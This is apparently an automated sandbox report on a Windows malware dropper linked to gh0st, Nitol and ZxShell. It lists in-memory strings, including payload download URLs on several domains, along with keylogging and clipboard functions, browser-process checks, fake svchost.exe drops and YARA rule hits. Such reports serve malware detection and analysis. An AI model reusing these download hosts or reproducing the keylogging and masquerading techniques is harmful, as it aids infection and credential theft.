Source: v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1:80/~
Source: G3izWAY3Fa.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: G3izWAY3Fa.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exe
Source: server.exe, 00000003.00000002.2683900710.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exe8
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exeb
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exee
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exee3
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exejlt
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exer
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exe~l
Source: server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2631462911.0000000000812000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exe
Source: server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exe-
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exeNoP
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exelo~
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exepoj
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exer
Source: server.exe, 00000003.00000002.2683900710.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exew
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.wk1888.com/
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.wk1888.com:2011/1.exe
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.wk1888.com:2011/1.exer
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.wk1888.com:2011/1.exetlV
Source: .exe, 00000005.00000002.2705462292.000000000234B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGY
Source: .exe, 00000005.00000002.2705462292.000000000234B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: server.exe, 00000003.00000002.2683900710.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: .exe, 00000005.00000002.2705732452.0000000002550000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.2682490023.00000000006B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: .exe, 00000005.00000002.2682490023.000000000069D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033BKSLMEM
Source: .exe, 00000005.00000002.2682490023.000000000069D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033FYMLMEM
Source: .exe, 00000005.00000002.2705732452.0000000002550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: .exe, 00000005.00000002.2682490023.000000000071F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3ez

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture and log keystrokes

Source: C:\Windows\Temp\server.exe	Code function: <BackSpace>	3_2_10009A00
Source: C:\Windows\Temp\server.exe	Code function: <Enter>	3_2_10009A00
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: <BackSpace>	8_2_10009A00
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: <Enter>	8_2_10009A00

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_00404EB9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404EB9

Source: C:\Windows\Temp\server.exe	Code function: 3_2_1000FA20 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,		3_2_1000FA20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1000FA20 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,		8_2_1000FA20

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000FA90 OpenClipboard,GetClipboardData,CloseClipboard,GlobalSize,GlobalLock,??2@YAPAXI@Z,GlobalUnlock,CloseClipboard,??3@YAXPAX@Z,

3_2_1000FA90

Source: C:\Windows\Temp\server.exe

Code function: 3_2_10009A00 GetKeyState,Sleep,lstrlen,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrcat,lstrlen,lstrcat,lstrcat,

3_2_10009A00

Source: C:\Windows\Temp\ .exe

Code function: 5_2_00457B94 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

5_2_00457B94

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\Temp\server.exe	Code function: RegOpenKeyExA,RegQueryValueA,RegCloseKey,Sleep,lstrlen,strstr,lstrcpy,CreateProcessA, Applications\iexplore.exe\shell\open\command		3_2_1000A6B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: RegOpenKeyExA,RegQueryValueA,RegCloseKey,Sleep,lstrlen,strstr,lstrcpy,CreateProcessA, Applications\iexplore.exe\shell\open\command		8_2_1000A6B0

Source: cmd.exe

Process created: 65

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: gh0st Author: https://github.com/jackcr/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects a ZxShell related sample from a CN threat group Author: Florian Roth
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects a ZxShell related sample from a CN threat group Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: gh0st Author: https://github.com/jackcr/
Source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY	Matched rule: gh0st Author: https://github.com/jackcr/

Source: C:\Windows\Temp\server.exe	Code function: 3_2_10002800 NtdllDefWindowProc_A,		3_2_10002800
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10002800 NtdllDefWindowProc_A,		8_2_10002800

Source: C:\Windows\Temp\ .exe

Code function: 5_2_0042E150: DeviceIoControl,

5_2_0042E150

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_0040351A OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,

2_2_0040351A

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,	0_2_004030CB
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10012010 ExitWindowsEx,	3_2_10012010
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1000B0F0 _strrev,_strrev,_strrev,GetVersionExA,ExitWindowsEx,	3_2_1000B0F0
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043A500 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043A500
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043AD30 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043AD30
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043ADF0 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043ADF0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10012010 ExitWindowsEx,	8_2_10012010
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1000B0F0 _strrev,_strrev,_strrev,GetVersionExA,ExitWindowsEx,	8_2_1000B0F0

Source: C:\Windows\Temp\server.exe	File created: C:\Windows\XXXXXX05CA35CC	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\05CA35CC	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\svchost.exe	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\RCX773C.tmp	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\kk	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\tt	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\bb	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\svchost.exe
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\RCX8B31.tmp

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_004046CA	0_2_004046CA
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_00405FA8	0_2_00405FA8
Source: C:\Windows\Temp\v5.exe	Code function: 2_2_00407470	2_2_00407470
Source: C:\Windows\Temp\server.exe	Code function: 3_2_004023C9	3_2_004023C9
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10037810	3_2_10037810
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10052816	3_2_10052816
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1005401A	3_2_1005401A
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10044020	3_2_10044020
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10051029	3_2_10051029
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10043030	3_2_10043030
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10037040	3_2_10037040
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10041850	3_2_10041850
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002F060	3_2_1002F060
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001D080	3_2_1001D080
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10036080	3_2_10036080
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002C090	3_2_1002C090
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10045090	3_2_10045090
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002C8A0	3_2_1002C8A0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002F8B0	3_2_1002F8B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100380B0	3_2_100380B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100348C0	3_2_100348C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100388C0	3_2_100388C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003F0C0	3_2_1003F0C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100678C0	3_2_100678C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100350E0	3_2_100350E0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100398F0	3_2_100398F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100518F1	3_2_100518F1
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10035900	3_2_10035900
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10040940	3_2_10040940
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10042170	3_2_10042170
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001C990	3_2_1001C990
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002E9A0	3_2_1002E9A0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100321B0	3_2_100321B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100369B0	3_2_100369B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100229C0	3_2_100229C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100289C0	3_2_100289C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004C1D0	3_2_1004C1D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100579D0	3_2_100579D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10030200	3_2_10030200
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10034200	3_2_10034200
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10042A00	3_2_10042A00
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10041220	3_2_10041220
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10017A30	3_2_10017A30
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003CA30	3_2_1003CA30
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10043A30	3_2_10043A30
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10031A40	3_2_10031A40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001DA50	3_2_1001DA50
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10040A50	3_2_10040A50
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10018A70	3_2_10018A70
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10014A70	3_2_10014A70
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003EA80	3_2_1003EA80
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10054ABB	3_2_10054ABB
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100312D0	3_2_100312D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003A2D0	3_2_1003A2D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002E2E0	3_2_1002E2E0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10032AE0	3_2_10032AE0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001E2F0	3_2_1001E2F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100682F0	3_2_100682F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10037B10	3_2_10037B10
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003C310	3_2_1003C310
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003BB20	3_2_1003BB20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004A320	3_2_1004A320
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10041B20	3_2_10041B20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10030B40	3_2_10030B40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004F34F	3_2_1004F34F
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002C350	3_2_1002C350
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10017360	3_2_10017360
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10038360	3_2_10038360
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001D370	3_2_1001D370
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003D390	3_2_1003D390
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001ABA0	3_2_1001ABA0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100393A0	3_2_100393A0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100563A0	3_2_100563A0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004FBC5	3_2_1004FBC5
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004B3C0	3_2_1004B3C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100233F0	3_2_100233F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003DBF0	3_2_1003DBF0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100413F0	3_2_100413F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10053418	3_2_10053418
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1005141B	3_2_1005141B
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10042420	3_2_10042420
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001543E	3_2_1001543E
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10040C40	3_2_10040C40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10034C70	3_2_10034C70
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001C480	3_2_1001C480
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001ACA0	3_2_1001ACA0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100364B0	3_2_100364B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002DCC0	3_2_1002DCC0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10035CC0	3_2_10035CC0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100554E0	3_2_100554E0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100334F0	3_2_100334F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100544FD	3_2_100544FD
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003AD00	3_2_1003AD00
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10015D10	3_2_10015D10
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001CD20	3_2_1001CD20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10035540	3_2_10035540
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003FD40	3_2_1003FD40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10034560	3_2_10034560
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002C570	3_2_1002C570
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10051DC7	3_2_10051DC7
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003CDC0	3_2_1003CDC0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100415C0	3_2_100415C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100145D0	3_2_100145D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004A5D0	3_2_1004A5D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10016DE0	3_2_10016DE0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10039DE0	3_2_10039DE0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004CDE0	3_2_1004CDE0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100505F7	3_2_100505F7
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10041DF0	3_2_10041DF0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10040E00	3_2_10040E00
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10037E10	3_2_10037E10
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10038610	3_2_10038610
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001DE40	3_2_1001DE40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001D650	3_2_1001D650
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10038E50	3_2_10038E50
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10022E60	3_2_10022E60
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10064E70	3_2_10064E70
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001568D	3_2_1001568D
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003B690	3_2_1003B690
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003C6A0	3_2_1003C6A0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100656D0	3_2_100656D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10066EE0	3_2_10066EE0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10033EF0	3_2_10033EF0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003F700	3_2_1003F700
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10057F20	3_2_10057F20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10013730	3_2_10013730
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10063F30	3_2_10063F30
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10063760	3_2_10063760
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10046F90	3_2_10046F90
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10040FC0	3_2_10040FC0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001BFD0	3_2_1001BFD0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003A7D0	3_2_1003A7D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100287F0	3_2_100287F0
Source: C:\Windows\Temp\v5.exe	Code function: 4_2_00407470	4_2_00407470
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00433020	5_2_00433020
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00458C58	5_2_00458C58
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00452655	5_2_00452655
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00447B9C	5_2_00447B9C
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0044DDAB	5_2_0044DDAB
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00443ED8	5_2_00443ED8
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_004023C9	8_2_004023C9
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10037810	8_2_10037810
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10052816	8_2_10052816
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1005401A	8_2_1005401A
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10044020	8_2_10044020
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10051029	8_2_10051029
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10043030	8_2_10043030
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10037040	8_2_10037040
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10041850	8_2_10041850
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002F060	8_2_1002F060
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001D080	8_2_1001D080
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10036080	8_2_10036080
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002C090	8_2_1002C090
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10045090	8_2_10045090
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002C8A0	8_2_1002C8A0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002F8B0	8_2_1002F8B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100380B0	8_2_100380B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100348C0	8_2_100348C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100388C0	8_2_100388C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003F0C0	8_2_1003F0C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100678C0	8_2_100678C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100350E0	8_2_100350E0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100398F0	8_2_100398F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100518F1	8_2_100518F1
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10035900	8_2_10035900
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10040940	8_2_10040940
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10042170	8_2_10042170
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001C990	8_2_1001C990
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002E9A0	8_2_1002E9A0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100321B0	8_2_100321B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100369B0	8_2_100369B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100229C0	8_2_100229C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100289C0	8_2_100289C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004C1D0	8_2_1004C1D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100579D0	8_2_100579D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10030200	8_2_10030200
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10034200	8_2_10034200
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10042A00	8_2_10042A00
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10041220	8_2_10041220
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10017A30	8_2_10017A30
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003CA30	8_2_1003CA30
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10043A30	8_2_10043A30
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10031A40	8_2_10031A40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001DA50	8_2_1001DA50
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10040A50	8_2_10040A50
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10018A70	8_2_10018A70
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10014A70	8_2_10014A70
